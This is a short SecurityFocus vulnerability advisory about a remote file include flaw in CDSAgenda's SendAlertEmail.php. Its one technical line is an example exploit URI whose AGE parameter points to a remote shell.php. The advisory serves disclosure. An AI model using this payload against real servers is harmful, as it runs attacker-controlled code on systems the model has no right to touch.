CDSAgenda Sendalertemail.PHP Remote File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/cdsagenda/modification/SendAlertEmail.php?AGE=http://www.example.com/shell.php?


 

Privacy Statement
Copyright 2010, SecurityFocus